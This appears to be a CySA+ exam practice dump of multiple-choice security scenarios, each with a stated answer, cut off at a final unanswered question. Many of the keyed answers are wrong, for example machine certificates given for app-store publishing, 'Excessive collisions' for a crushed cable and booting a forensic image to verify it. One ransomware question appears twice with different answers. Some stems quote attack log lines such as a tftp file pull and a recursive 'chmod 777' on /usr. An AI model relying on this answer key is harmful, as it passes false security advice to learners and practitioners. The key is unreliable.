CySA+
Various devices are connecting and authenticating to a single evil twin within the network. Which of the following are MOST likely being targeted? Mobile devices All endpoints VPNs Network infrastructure Wired SCADA devices
Mobile devices
A recent vulnerability scan found four vulnerabilities on an organizations public Internet-facing IP addresses. Prioritizing in order to reduce the risk of a breach to the organization, which of the following should be remediated FIRST? A cipher that is known to be cryptographically weak. A website using a self-signed SSL certificate. A buffer overflow that allows remote code execution. An HTTP response that reveals an internal IP address.
A buffer overflow that allows remote code execution.
The Chief Information Security Officer (CISO) has decided that all accounts with elevated privileges must use a longer, more complicated passphrase instead of a password. The CISO would like to formally document managements intent to set this control level. Which of the following is the appropriate means to achieve this? A control A standard A policy A guideline
A policy
An analyst is preparing for a technical security compliance check on all Apache servers. Which of the following will be the BEST to use? CIS benchmark Nagios OWASP Untidy Cain & Abel
CIS benchmark
Which of the following BEST describes the offensive participants in a tabletop exercise? Red team Blue team System administrators Security analysts Operations team
Red team
A cybersecurity analyst wants to use ICMP ECHO_REQUEST on a machine while using Nmap. Which of the following is the correct command to accomplish this? $ nmap PE 192.168.1.7 $ ping -PE 192.168.1.7 $ nmap -traceroute 192.168.1.7 $ nmap PO 192.168.1.7
$ nmap PE 192.168.1.7
An organization uses Common Vulnerability Scoring System (CVSS) scores to prioritize remediation of vulnerabilities. Management wants to modify the priorities based on a difficulty factor so that vulnerabilities with lower CVSS scores may get a higher priority if they are easier to implement with less risk to system functionality. Management also wants to quantify the priority. Which of the following would achieve managements objective? (CVSS Score) * Difficulty = Priority Where Difficulty is a range from 0.1 to 1.0 with 1.0 being easiest and lowest risk to implement (CVSS Score) * Difficulty = Priority Where Difficulty is a range from 1 to 5 with 1 being easiest and lowest risk to implement (CVSS Score) / Difficulty = Priority Where Difficulty is a range from 1 to 10 with 10 being easiest and lowest risk to implement ((CVSS Score) * 2) / Difficulty = Priority Where CVSS Score is weighted and Difficulty is a range from 1 to 5 with 5 being easiest and lowest risk to implement
(CVSS Score) / Difficulty = Priority Where Difficulty is a range from 1 to 10 with 10 being easiest and lowest risk to implement
A red team actor observes it is common practice to allow cell phones to charge on company computers, but access to the memory storage is blocked. Which of the following are common attack techniques that take advantage of this practice? (Choose two.) A USB attack that tricks the computer into thinking the connected device is a keyboard, and then sends characters one at a time as a keyboard to launch the attack (a prerecorded series of keystrokes) A USB attack that turns the connected device into a rogue access point that spoofs the configured wireless SSIDs A Bluetooth attack that modifies the device registry (Windows PCs only) to allow the flash drive to mount, and then launches a Java applet attack A Bluetooth peering attack called Snarfing that allows Bluetooth connections on blocked device types if physically connected to a USB port A USB attack that tricks the system into thinking it is a network adapter, then runs a user password hash gathering utility for offline password cracking
A Bluetooth attack that modifies the device registry (Windows PCs only) to allow the flash drive to mount, and then launches a Java applet attack A Bluetooth peering attack called Snarfing that allows Bluetooth connections on blocked device types if physically connected to a USB port
When reviewing the system logs, the cybersecurity analyst noticed a suspicious log entry: wmic /node: HRDepartment1 computersystem get username Which of the following combinations describes what occurred, and what action should be taken in this situation? A rogue user has queried for users logged in remotely. Disable local access to network shares. A rogue user has queried for the administrator logged into the system. Attempt to determine who executed the command. A rogue user has queried for the administrator logged into the system. Disable local access to use cmd prompt. A rogue user has queried for users logged into in remotely. Attempt to determine who executed the command.
A rogue user has queried for users logged into in remotely. Attempt to determine who executed the command.
Management wants to scan servers for vulnerabilities on a periodic basis. Management has decided that the scan frequency should be determined only by vendor patch schedules and the organizations application deployment schedule. Which of the following would force the organization to conduct an out-of-cycle vulnerability scan? Newly discovered PII on a server A vendor releases a critical patch update A critical bug fix in the organizations application False positives identified in production
A vendor releases a critical patch update
An analyst was tasked with providing recommendations of technologies that are PKI X.509 compliant for a variety of secure functions. Which of the following technologies meet the compatibility requirement? (Select three.) 3DES AES IDEA PKCS PGP SSL/TLS TEMPEST
AES PKCS SSL/TLS
A security administrator has uncovered a covert channel used to exfiltrate confidential data from an internal database server through a compromised corporate web server. Ongoing exfiltration is accomplished by embedding a small amount of data extracted from the database into the metadata of images served by the web server. File timestamps suggest that the server was initially compromised six months ago using a common server misconfiguration. Which of the following BEST describes the type of threat being used? APT Zero-day attack Man-in-the-middle attack XSS
APT
A security analyst is performing a forensic analysis on a machine that was the subject of some historic SIEM alerts. The analyst noticed some network connections utilizing SSL on non-common ports, copies of svchost.exe and cmd.exe in %TEMP% folder, and RDP files that had connected to external IPs. Which of the following threats has the security analyst uncovered? DDoS APT Ransomware Software vulnerability
APT
A threat intelligence analyst who works for a technology firm received this report from a vendor. There has been an intellectual property theft campaign executed against organizations in the technology industry. Indicators for this activity are unique to each intrusion. The information that appears to be targeted is R&D data. The data exfiltration appears to occur over months via uniform TTPs. Please execute a defensive operation regarding this attack vector. Which of the following combinations suggests how the threat should MOST likely be classified and the type of analysis that would be MOST helpful in protecting against this activity? Polymorphic malware and secure code analysis Insider threat and indicator analysis APT and behavioral analysis Ransomware and encryption
APT and behavioral analysis
A database administrator contacts a security administrator to request firewall changes for a connection to a new internal application. The security administrator notices that the new application uses a port typically monopolized by a virus. The security administrator denies the request and suggests a new port or service be used to complete the applications task. Which of the following is the security administrator practicing in this example? Explicit deny Port security Access control lists Implicit deny
Access control lists
The help desk informed a security analyst of a trend that is beginning to develop regarding a suspicious email that has been reported by multiple users. The analyst has determined the email includes an attachment named invoice.zip that contains the following files: Locky.js xerty.ini xerty.lib Further analysis indicates that when the .zip file is opened, it is installing a new version of ransomware on the devices. Which of the following should be done FIRST to prevent data on the company NAS from being encrypted by infected devices? Disable access to the company VPN. Move the files from the NAS to a cloud-based storage solution. Set permissions on file shares to read-only. Add the URL included in the .js file to the companys web proxy filter.
Add the URL included in the .js file to the companys web proxy filter.
File integrity monitoring states the following files have been changed without a written request or approved change. The following change has been made: chmod 777 Rv /usr Which of the following may be occurring? The ownership pf /usr has been changed to the current user. Administrative functions have been locked from users. Administrative commands have been made world readable/writable. The ownership of/usr has been changed to the root user.
Administrative commands have been made world readable/writable.
A threat intelligence feed has posted an alert stating there is a critical vulnerability in the kernel. Unfortunately, the companys asset inventory is not current. Which of the following techniques would a cybersecurity analyst perform to find all affected servers within an organization? A manual log review from data sent to syslog An OS fingerprinting scan across all hosts A packet capture of data traversing the server network A service discovery scan on the network
An OS fingerprinting scan across all hosts
A university wants to increase the security posture of its network by implementing vulnerability scans of both centrally managed and student/employee laptops. The solution should be able to scale, provide minimum false positives and high accuracy of results, and be centrally managed through an enterprise console. Which of the following scanning topologies is BEST suited for this environment? A passive scanning engine located at the core of the network infrastructure A combination of cloud-based and server-based scanning engines A combination of server-based and agent-based scanning engines An active scanning engine installed on the enterprise console
An active scanning engine installed on the enterprise console
A security analyst has noticed an alert from the SIEM. A workstation is repeatedly trying to connect to port 445 of a file server on the production network. All of the attempts are made with invalid credentials. Which of the following describes what is occurring? Malware has infected the workstation and is beaconing out to the specific IP address of the file server. The file server is attempting to transfer malware to the workstation via SMB. An attacker has gained control of the workstation and is attempting to pivot to the file server by creating an SMB session. An attacker has gained control of the workstation and is port scanning the network.
An attacker has gained control of the workstation and is attempting to pivot to the file server by creating an SMB session.
A cybersecurity analyst has received an alert that well-known call home messages are continuously observed by network sensors at the network boundary. The proxy firewall successfully drops the messages. After determining the alert was a true positive, which of the following represents the MOST likely cause? Attackers are running reconnaissance on company resources. An outside command and control system is attempting to reach an infected system. An insider is trying to exfiltrate information to a remote network. Malware is running on a company system.
An outside command and control system is attempting to reach an infected system.
A cybersecurity analyst has several SIEM event logs to review for possible APT activity. The analyst was given several items that include lists of indicators for both IP addresses and domains. Which of the following actions is the BEST approach for the analyst to perform? Use the IP addresses to search through the event logs. Analyze the trends of the events while manually reviewing to see if any of the indicators match. Create an advanced query that includes all of the indicators, and review any of the matches. Scan for vulnerabilities with exploits known to have been used by an APT.
Analyze the trends of the events while manually reviewing to see if any of the indicators match.
An organization wants to remediate vulnerabilities associated with its web servers. An initial vulnerability scan has been performed, and analysts are reviewing the results. Before starting any remediation, the analysts want to remove false positives to avoid spending time on issues that are not actual vulnerabilities. Which of the following would be an indicator of a likely false positive? Reports indicate that findings are informational. Any items labeled low are considered informational only. The scan result version is different from the automated asset inventory. HTTPS entries indicate the web page is encrypted securely.
Any items labeled low are considered informational only.
An organization wants to remediate vulnerabilities associated with its web servers. An initial vulnerability scan has been performed, and analysts are reviewing the results. Before starting any remediation, the analysts want to remove false positives to avoid spending time on issues that are not actual vulnerabilities. Which of the following would be an indicator of a likely false positive? Reports show the scanner compliance plug-in is out-of-date. Any items labeled low are considered informational only. The scan result version is different from the automated asset inventory. HTTPS entries indicate the web page is encrypted securely.
Any items labeled low are considered informational only.
A cybersecurity analyst is hired to review the security posture of a company. The cybersecurity analyst notices a very high network bandwidth consumption due to SYN floods from a small number of IP addresses. Which of the following would be the BEST action to take to support incident response? Increase the companys bandwidth. Apply ingress filters at the routers. Install a packet capturing tool. Block all SYN packets.
Apply ingress filters at the routers.
A cybersecurity analyst is reviewing Apache logs on a web server and finds that some logs are missing. The analyst has identified that the systems administrator accidentally deleted some log files. Which of the following actions or rules should be implemented to prevent this incident from reoccurring? Personnel training Separation of duties Mandatory vacation Backup server
Backup server
Which of the following best practices is used to identify areas in the network that may be vulnerable to penetration testing from known external sources? Blue team training exercises Technical control reviews White team training exercises Operational control reviews
Blue team training exercises
A security analyst has just completed a vulnerability scan of servers that support a business critical application that is managed by an outside vendor. The results of the scan indicate the devices are missing critical patches. Which of the following factors can inhibit remediation of these vulnerabilities? (Choose two.) Inappropriate data classifications SLAs with the supporting vendor Business process interruption Required sandbox testing Incomplete asset inventory
Business process interruption Required sandbox testing
An organization wants to harden its web servers. As part of this goal, leadership has directed that vulnerability scans be performed, and the security team should remediate the servers according to industry best practices. The team has already chosen a vulnerability scanner and performed the necessary scans, and now the team needs to prioritize the fixes. Which of the following would help to prioritize the vulnerabilities for remediation in accordance with industry best practices? CVSS SLA ITIL OpenVAS Qualys
CVSS
A pharmacy gives its clients online access to their records and the ability to review bills and make payments. A new SSL vulnerability on a special platform was discovered, allowing an attacker to capture the data between the end user and the web server providing these services. After investigating the platform vulnerability, it was determined that the web services provided are being impacted by this new threat. Which of the following data types are MOST likely at risk of exposure based on this new threat? (Choose two.) Cardholder data Intellectual property Personal health information Employee records Corporate financial data
Cardholder data Personal health information
An ATM in a building lobby has been compromised. A security technician has been advised that the ATM must be forensically analyzed by multiple technicians. Which of the following items in a forensic tool kit would likely be used FIRST? (Select TWO). Drive adapters Chain of custody form Write blockers Crime tape Hashing utilities Drive imager
Chain of custody form Write blockers
A security audit revealed that port 389 has been used instead of 636 when connecting to LDAP for the authentication of users. The remediation recommended by the audit was to switch the port to 636 wherever technically possible. Which of the following is the BEST response? Correct the audit. This finding is a well-known false positive; the services that typically run on 389 and 636 are identical. Change all devices and servers that support it to 636, as encrypted services run by default on 636. Change all devices and servers that support it to 636, as 389 is a reserved port that requires root access and can expose the server to privilege escalation attacks. Correct the audit. This finding is accurate, but the correct remediation is to update encryption keys on each of the servers to match port 636.
Change all devices and servers that support it to 636, as encrypted services run by default on 636.
A security analyst has performed various scans and found vulnerabilities in several applications that affect production data. Remediation of all exploits may cause certain applications to no longer work. Which of the following activities would need to be conducted BEFORE remediation? Fuzzing Input validation Change control Sandboxing
Change control
A cybersecurity professional typed in a URL and discovered the admin panel for the e-commerce application is accessible over the open web with the default password. Which of the following is the MOST secure solution to remediate this vulnerability? Rename the URL to a more obscure name, whitelist all corporate IP blocks, and require two-factor authentication. Change the default password, whitelist specific source IP addresses, and require two-factor authentication. Whitelist all corporate IP blocks, require an alphanumeric passphrase for the default password, and require two-factor authentication. Change the username and default password, whitelist specific source IP addresses, and require two-factor authentication.
Change the username and default password, whitelist specific source IP addresses, and require two-factor authentication.
A manufacturing company has decided to participate in direct sales of its products to consumers. The company decides to use a subdomain of its main site with its existing cloud service provider as the portal for e-commerce. After launch, the site is stable and functions properly, but after a robust day of sales, the site begins to redirect to a competitors landing page. Which of the following actions should the companys security team take to determine the cause of the issue and minimize the scope of impact? Engage a third party to provide penetration testing services to see if an exploit can be found Check DNS records to ensure Cname or alias records are in place for the subdomain Query the cloud provider to determine the nature of the DNS attack and find out which other clients are affected Check the DNS records to ensure a correct MX record is established for the subdomain
Check DNS records to ensure Cname or alias records are in place for the subdomain
A security administrator uses FTK to take an image of a hard drive that is under investigation. Which of the following processes are used to ensure the image is the same as the original disk? (Choose two.) Validate the folder and file directory listings on both. Check the hash value between the image and the original. Boot up the image and the original systems to compare. Connect a write blocker to the imaging device. Copy the data to a disk of the same size and manufacturer.
Check the hash value between the image and the original. Boot up the image and the original systems to compare.
In the development stage of the incident response policy, the security analyst needs to determine the stakeholders for the policy. Who of the following would be the policy stakeholders? Human resources, legal, public relations, management Chief information Officer (CIO), Chief Executive Officer, board of directors, stockholders IT, human resources, security administrator, finance Public information officer, human resources, audit, customer service
Chief information Officer (CIO), Chief Executive Officer, board of directors, stockholders
After reading about data breaches at a competing company, senior leaders in an organization have grown increasingly concerned about social engineering attacks. They want to increase awareness among staff regarding this threat, but do not want to use traditional training methods because they regard these methods as ineffective. Which of the following approaches would BEST meet the requirements? Classroom training on the dangers of social media followed by a test and gift certificates for any employee getting a perfect score. Simulated phishing emails asking employees to reply to the email with their updated phone number and office location A poster contest to raise awareness of PII and asking employees to provide examples of data breaches and consequences USB drives randomly placed inside and outside the organization that contain a pop-up warning to any users who plug the drive into their computer
Classroom training on the dangers of social media followed by a test and gift certificates for any employee getting a perfect score.
A new zero-day vulnerability was discovered within a basic screen capture app, which is used throughout the environment. Two days after discovering the vulnerability, the manufacturer of the software has not announced a remediation or if there will be a fix for this newly discovered vulnerability. The vulnerable application is not uniquely critical, but it is used occasionally by the management and executive management teams. The vulnerability allows remote code execution to gain privileged access to the system. Which of the following is the BEST course of actions to mitigate this threat? Work with the manufacturer to determine the time frame for the fix. Block the vulnerable application traffic at the firewall and disable the application services on each computer. Remove the application and replace it with a similar non-vulnerable application. Communicate with the end users that the application should not be used until the manufacturer has resolved the vulnerability.
Communicate with the end users that the application should not be used until the manufacturer has resolved the vulnerability.
A company allows employees to work remotely. The security administration is configuring services that will allow remote help desk personnel to work secure outside the companys headquarters. Which of the following presents the BEST solution to meet this goal? Configure a VPN concentrator to terminate in the DMZ to allow help desk personnel access to resources. Open port 3389 on the firewall to the server to allow users to connect remotely. Set up a jump box for all help desk personnel to remotely access system resources. Use the companys existing web server for remote access and configure over port 8080.
Configure a VPN concentrator to terminate in the DMZ to allow help desk personnel access to resources.
A security analyst determines that several workstations are reporting traffic usage on port 3389. All workstations are running the latest OS patches according to patch reporting. The help desk manager reports some users are getting logged off of their workstations, and network access is running slower than normal. The analyst believes a zero-day threat has allowed remote attackers to gain access to the workstations. Which of the following are the BEST steps to stop the threat without impacting all services? (Choose two.) Change the public NAT IP address since APTs are common. Configure a group policy to disable RDP access. Disconnect public Internet access and review the logs on the workstations. Enforce a password change for users on the network. Reapply the latest OS patches to workstations. Route internal traffic through a proxy server.
Configure a group policy to disable RDP access. Enforce a password change for users on the network.
Several accounting department users are reporting unusual Internet traffic in the browsing history of their workstations after returning to work and logging in. The building security team informs the IT security team that the cleaning staff was caught using the systems after the accounting department users left for the day. Which of the following steps should the IT security team take to help prevent this from happening again? (Choose two.) Install a web monitor application to track Internet usage after hours. Configure a policy for workstation account timeout at three minutes. Configure NAC to set time-based restrictions on the accounting group to normal business hours. Configure mandatory access controls to allow only accounting department users to access the workstations. Set up a camera to monitor the workstations for unauthorized use.
Configure a policy for workstation account timeout at three minutes. Configure NAC to set time-based restrictions on the accounting group to normal business hours.
An analyst finds that unpatched servers have undetected vulnerabilities because the vulnerability scanner does not have the latest set of signatures. Management directed the security team to have personnel update the scanners with the latest signatures at least 24 hours before conducting any scans, but the outcome is unchanged. Which of the following is the BEST logical control to address the failure? Configure a script to automatically update the scanning tool. Manually validate that the existing update is being performed. Test vulnerability remediation in a sandbox before deploying. Configure vulnerability scans to run in credentialed mode.
Configure a script to automatically update the scanning tool.
A security analyst is performing a review of Active Directory and discovers two new user accounts in the accounting department. Neither of the users has elevated permissions, but accounts in the group are given access to the companys sensitive financial management application by default. Which of the following is the BEST course of action? Follow the incident response plan for the introduction of new accounts Disable the user accounts Remove the accounts access privileges to the sensitive application Monitor the outbound traffic from the application for signs of data exfiltration Confirm the accounts are valid and ensure role-based permissions are appropriate
Confirm the accounts are valid and ensure role-based permissions are appropriate
A cybersecurity analyst traced the source of an attack to compromised user credentials. Log analysis revealed that the attacker successfully authenticated from an unauthorized foreign country. Management asked the security analyst to research and implement a solution to help mitigate attacks based on compromised passwords. Which of the following should the analyst implement? Self-service password reset Single sign-on Context-based authentication Password complexity
Context-based authentication
During a quarterly review of user accounts and activity, a security analyst noticed that after a password reset the head of human resources has been logging in from multiple locations, including several overseas. Further review of the account showed access rights to a number of corporate applications, including a sensitive accounting application used for employee bonuses. Which of the following security methods could be used to mitigate this risk? RADIUS identity management Context-based authentication Privilege escalation restrictions Elimination of self-service password resets
Context-based authentication
A company decides to move three of its business applications to different outsourced cloud providers. After moving the applications, the users report the applications time out too quickly and too much time is spent logging back into the different web-based applications throughout the day. Which of the following should a security architect recommend to improve the end-user experience without lowering the security posture? Configure directory services with a federation provider to manage accounts. Create a group policy to extend the default system lockout period. Configure a web browser to cache the user credentials. Configure user accounts for self-service account management.
Create a group policy to extend the default system lockout period.
An organization has two environments: development and production. Development is where applications are developed with unit testing. The development environment has many configuration differences from the production environment. All applications are hosted on virtual machines. Vulnerability scans are performed against all systems before and after any application or configuration changes to any environment. Lately, vulnerability remediation activity has caused production applications to crash and behave unpredictably. Which of the following changes should be made to the current vulnerability management process? Create a third environment between development and production that mirrors production and tests all changes before deployment to the users Refine testing in the development environment to include fuzzing and user acceptance testing so applications are more stable before they migrate to production Create a second production environment by cloning the virtual machines, and if any stability problems occur, migrate users to the alternate production environment Refine testing in the production environment to include more exhaustive application stability testing while continuing to maintain the robust vulnerability remediation activities
Create a third environment between development and production that mirrors production and tests all changes before deployment to the users
The security configuration management policy states that all patches must undergo testing procedures before being moved into production. The security analyst notices a single web application server has been downloading and applying patches during non-business hours without testing. There are no apparent adverse reactions, server functionality does not seem to be affected, and no malware was found after a scan. Which of the following actions should the analyst take? Reschedule the automated patching to occur during business hours. Monitor the web application service for abnormal bandwidth consumption. Create an incident ticket for anomalous activity. Monitor the web application for service interruptions caused from the patching.
Create an incident ticket for anomalous activity.
A cyber incident response team finds a vulnerability on a company website that allowed an attacker to inject malicious code into its web application. There have been numerous unsuspecting users visiting the infected page, and the malicious code executed on the victims browser has led to stolen cookies, hijacked sessions, malware execution, and bypassed access control. Which of the following exploits is the attacker conducting on the companys website? Logic bomb Rootkit Privilege escalation Cross-site scripting
Cross-site scripting
A business recently installed a kiosk that is running on a hardened operating system as a restricted user. The kiosk user application is the only application that is allowed to run. A security analyst gets a report that pricing data is being modified on the server, and management wants to know how this is happening. After reviewing the logs, the analyst discovers the root account from the kiosk is accessing the files. After validating the permissions on the server, the analyst confirms the permissions from the kiosk do not allow to write to the server data. Which of the following is the MOST likely reason for the pricing data modifications on the server? Data on the server is not encrypted, allowing users to change the pricing data. The kiosk user account has execute permissions on the server data files. Customers are logging off the kiosk and guessing the root account password. Customers are escaping the application shell and gaining root-level access.
Customers are escaping the application shell and gaining root-level access.
A software development company in the manufacturing sector has just completed the alpha version of its flagship application. The application has been under development for the past three years. The SOC has seen intrusion attempts made by indicators associated with a particular APT. The company has a hot site location for COOP. Which of the following threats would most likely incur the BIGGEST economic impact for the company? DDoS ICS destruction IP theft IPS evasion
DDoS
A security operations team was alerted to abnormal DNS activity coming from a users machine. The team performed a forensic investigation and discovered a host had been compromised. Malicious code was using DNS as a tunnel to extract data from the client machine, which had been leaked and transferred to an unsecure public Internet site. Which of the following BEST describes the attack? Phishing Pharming Cache poisoning Data exfiltration
Data exfiltration
In reviewing firewall logs, a security analyst has discovered the following IP address, which several employees are using frequently: 152.100.57.18 The organizations servers use IP addresses in the 192.168.0.1/24 CIDR. Additionally, the analyst has noticed that corporate data is being stored at this new location. A few of these employees are on the management and executive management teams. The analyst has also discovered that there is no record of this IP address or service in reviewing the known locations of managing system assets. Which of the following is occurring in this scenario? Malicious process Unauthorized change Data exfiltration Unauthorized access
Data exfiltration
A systems administrator is trying to secure a critical system. The administrator has placed the system behind a firewall, enabled strong authentication, and required all administrators of this system to attend mandatory training. Which of the following BEST describes the control being implemented? Audit remediation Defense in depth Access control Multifactor authentication
Defense in depth
The help desk has reported that users are reusing previous passwords when prompted to change them. Which of the following would be the MOST appropriate control for the security analyst to configure to prevent password reuse? (Choose two.) Implement mandatory access control on all workstations. Implement role-based access control within directory services. Deploy Group Policy Objects to domain resources. Implement scripts to automate the configuration of PAM on Linux hosts. Deploy a single-sing-on solution for both Windows and Linux hosts.
Deploy Group Policy Objects to domain resources.
An investigation showed a worm was introduced from an engineers laptop. It was determined the company does not provide engineers with company-owned laptops, which would be subject to company policy and technical controls. Which of the following would be the MOST secure control implement? Deploy HIDS on all engineer-provided laptops, and put a new router in the management network. Implement role-based group policies on the management network for client access. Utilize a jump box that is only allowed to connect to clients from the management network. Deploy a company-wide approved engineering workstation for management access.
Deploy a company-wide approved engineering workstation for management access.
A company is developing its first mobile application, which will be distributed via the official application stores of the two major mobile platforms. Which of the following is a prerequisite to making the applications available in the application stores? Distribute user certificates. Deploy machine/computer certificates. Obtain a code-signing certificate. Implement a CRL.
Deploy machine/computer certificates.
A cybersecurity analyst was hired to resolve a security issue within a company after it was reported that many employee account passwords had been compromised. Upon investigating the incident, the cybersecurity analyst found that a brute force attack was launched against the company. Which of the following remediation actions should the cybersecurity analyst recommend to senior management to address these security issues? Prohibit password reuse using a GPO. Deploy multifactor authentication. Require security awareness training. Implement DLP solution.
Deploy multifactor authentication.
Which of the allowing is a best practice with regard to interacting with the media during an incident? Allow any senior management level personnel with knowledge of the incident to discuss it. Designate a single port of contact and at least one backup for contact with the media. Stipulate that incidents are not to be discussed with the media at any time during the incident. Release financial information on the impact of damages caused by the incident.
Designate a single port of contact and at least one backup for contact with the media.
A security analyst is conducting a vulnerability assessment of older SCADA devices on the corporate network. Which of the following compensating controls is likely to prevent the scans from providing value? Access control list network segmentation that prevents access to the SCADA devices inside the network. Detailed and tested firewall rules that effectively prevent outside access of the SCADA devices. Implementation of a VLAN that allows all devices on the network to see all SCADA devices on the network. SCADA systems configured with SCADA SUPPORT=ENABLE
Detailed and tested firewall rules that effectively prevent outside access of the SCADA devices.
An analyst was testing the latest version of an internally developed CRM system. The analyst created a basic user account. Using a few tools in Kalis latest distribution, the analyst was able to access configuration files, change permissions on folders and groups, and delete and create new system objects. Which of the following techniques did the analyst use to perform these unauthorized activities? Impersonation Privilege escalation Directory traversal Input injection
Directory traversal
Ann, a user, reports to the security team that her browser began redirecting her to random sites while using her Windows laptop. Ann further reports that the OS shows the C: drive is out of space despite having plenty of space recently. Ann claims she not downloaded anything. The security team obtains the laptop and begins to investigate, noting the following: File access auditing is turned off. When clearing up disk space to make the laptop functional, files that appear to be cached web pages are immediately created in a temporary directory, filling up the available drive space. All processes running appear to be legitimate processes for this user and machine. Network traffic spikes when the space is cleared on the laptop. No browser is open. Which of the following initial actions and tools would provide the BEST approach to determining what is happening? Delete the temporary files, run an Nmap scan, and utilize Burp Suite. Disable the network connection, check Sysinternals Process Explorer, and review netstat output. Perform a hard power down of the laptop, take a dd image, and analyze with FTK. Review logins to the laptop, search Windows Event Viewer, and review Wireshark captures.
Disable the network connection, check Sysinternals Process Explorer, and review netstat output.
When network administrators observe an increased amount of web traffic without an increased number of financial transactions, the company is MOST likely experiencing which of the following attacks? Bluejacking ARP cache poisoning Phishing DoS
DoS
An analyst suspects a large database that contains customer information and credit card data was exfiltrated to a known hacker group in a foreign country. Which of the following incident response steps should the analyst take FIRST? Immediately notify law enforcement, as they may be able to help track down the hacker group before customer information is disseminated. Draft and publish a notice on the companys website about the incident, as PCI regulations require immediate disclosure in the case of a breach of PII or card data. Isolate the server, restore the database to a time before the vulnerability occurred, and ensure the database is encrypted. Document and verify all evidence and immediately notify the companys Chief Information Security Officer (CISO) to better understand the next steps.
Document and verify all evidence and immediately notify the companys Chief Information Security Officer (CISO) to better understand the next steps.
A company has implemented WPA2, a 20-character minimum for the WiFi passphrase, and a new WiFi passphrase every 30 days, and has disabled SSID broadcast on all wireless access points. Which of the following is the company trying to mitigate? Downgrade attacks Rainbow tables SSL pinning Forced deauthentication
Downgrade attacks
The help desk informed a security analyst of a trend that is beginning to develop regarding a suspicious email that has been reported by multiple users. The analyst has determined the email includes an attachment named invoice.zip that contains the following files: Locky.js xerty.ini xerty.lib Further analysis indicates that when the .zip file is opened, it is installing a new version of ransomware on the devices. Which of the following should be done FIRST to prevent data on the company NAS from being encrypted by infected devices? Disable access to the company VPN. Email employees instructing them not to open the invoice attachment. Set permissions on file shares to read-only. Add the URL included in the .js file to the companys web proxy filter.
Email employees instructing them not to open the invoice attachment.
A Chief Executive Officer (CEO) wants to implement BYOD in the environment. Which of the following options should the security analyst suggest to protect corporate data on these devices? (Choose two.) Disable VPN connectivity on the device. Disable Bluetooth on the device. Disable near-field communication on the device. Enable MDM/MAM capabilities. Enable email services on the device. Enable encryption on all devices.
Enable MDM/MAM capabilities. Enable encryption on all devices.
Which of the following is the BEST way to share incident-related artifacts to provide non-repudiation? Secure email Encrypted USB drives Cloud containers Network folders
Encrypted USB drives
A business-critical application is unable to support the requirements in the current password policy because it does not allow the use of special characters. Management does not want to accept the risk of a possible security incident due to weak password standards. Which of the following is an appropriate means to limit the risks related to the application? A compensating control Altering the password policy Creating new account management procedures Encrypting authentication traffic
Encrypting authentication traffic
A new security manager was hired to establish a vulnerability management program. The manager asked for a corporate strategic plan and risk register that the project management office developed. The manager conducted a tools and skill sets inventory to document the plan. Which of the following is a critical task for the establishment of a successful program? Establish continuous monitoring Update vulnerability feed Perform information classification Establish corporate policy
Establish corporate policy
A technician receives a report that a users workstation is experiencing no network connectivity. The technician investigates and notices the patch cable running the back of the users VoIP phone is routed directly under the rolling chair and has been smashed flat over time. Which of the following is the most likely cause of this issue? Cross-talk Electromagnetic interference Excessive collisions Split pairs
Excessive collisions
The Chief Security Officer (CSO) has requested a vulnerability report of systems on the domain, identifying those running outdated OSs. The automated scan reports are not displaying OS version details, so the CSO cannot determine risk exposure levels from vulnerable systems. Which of the following should the cybersecurity analyst do to enumerate OS information as part of the vulnerability scanning process in the MOST efficient manner? Execute the ver command Execute the nmap p command Use Wireshark to export a list Use credentialed configuration
Execute the ver command
A security analyst notices PII has been copied from the customer database to an anonymous FTP server in the DMZ. Firewall logs indicate the customer database has not been accessed from anonymous FTP server. Which of the following departments should make a decision about pursuing further investigation? (Choose two.) Human resources Public relations Legal Executive management IT management
Executive management ?
A security analyst is conducting traffic analysis and observes an HTTP POST to the companys main web server. The POST header is approximately 1000 bytes in length. During transmission, one byte is delivered every ten seconds. Which of the following attacks is the traffic indicative of? Exfiltration DoS Buffer overflow SQL injection
Exfiltration
An analyst received a forensically sound copy of an employees hard drive. The employees manager suspects inappropriate images may have been deleted from the hard drive. Which of the following could help the analyst recover the deleted evidence? File hashing utility File timestamps File carving tool File analysis tool
File carving tool
Joe, a user, is unable to launch an application on his laptop, which he typically uses on a daily basis. Joe informs a security analyst of the issue. After an online database comparison, the security analyst checks the SIEM and notices alerts indicating certain .txt and .dll files are blocked. Which of the following tools would generate these logs? Antivirus HIPS Firewall Proxy
Firewall
Weeks before a proposed merger is scheduled for completion, a security analyst has noticed unusual traffic patterns on a file server that contains financial information. Routine scans are not detecting the signature of any known exploits or malware. The following entry is seen in the ftp server logs: tftp I 10.1.1.1 GET fourthquarterreport.xls Which of the following is the BEST course of action? Continue to monitor the situation using tools to scan for known exploits. Implement an ACL on the perimeter firewall to prevent data exfiltration. Follow the incident response procedure associate with the loss of business critical data. Determine if any credit card information is contained on the server containing the financials.
Follow the incident response procedure associate with the loss of business critical data.
A cybersecurity analyst is currently investigating a server outage. The analyst has discovered the following value was entered for the username: 0xbfff601a. Which of the following attacks may be occurring? Buffer overflow attack Man-in-the-middle attack Smurf attack Format string attack Denial of service attack
Format string attack
A security analyst positively identified the threat, vulnerability, and remediation. The analyst is ready to implement the corrective control. Which of the following would be the MOST inhibiting to applying the fix? Requiring a firewall reboot. Resetting all administrator passwords. Business process interruption. Full desktop backups.
Full desktop backups.
As part of the SDLC, software developers are testing the security of a new web application by inputting large amounts of random data. Which of the following types of testing is being performed? Fuzzing Regression testing Stress testing Input validation
Fuzzing
A software assurance lab is performing a dynamic assessment on an application by automatically generating and inputting different, random data sets to attempt to cause an error/failure condition. Which of the following software assessment capabilities is the lab performing AND during which phase of the SDLC should this occur? (Select two.) Fuzzing Behavior modeling Static code analysis Prototyping phase Requirements phase Planning phase
Fuzzing Prototyping phase
A company office was broken into over the weekend. The office manager contacts the IT security group to provide details on which servers were stolen. The security analyst determines one of the stolen servers contained a list of customer PII information, and another server contained a copy of the credit card transactions processed on the Friday before the break-in. In addition to potential security implications of information that could be gleaned from those servers and the rebuilding/restoring of the data on the stolen systems, the analyst needs to determine any communication or notification requirements with respect to the incident. Which of the following items is MOST important when determining what information needs to be provided, who should be contacted, and when the communication needs to occur. Total number of records stolen Government and industry regulations Impact on the reputation of the companys name/brand Monetary value of data stolen
Government and industry regulations
A company wants to update its acceptable use policy (AUP) to ensure it relates to the newly implemented password standard, which requires sponsored authentication of guest wireless devices. Which of the following is MOST likely to be incorporated in the AUP? Sponsored guest passwords must be at least ten characters in length and contain a symbol. The corporate network should have a wireless infrastructure that uses open authentication standards. Guests using the wireless network should provide valid identification when registering their wireless devices. The network should authenticate all guest users using 802.1x backed by a RADIUS or LDAP server.
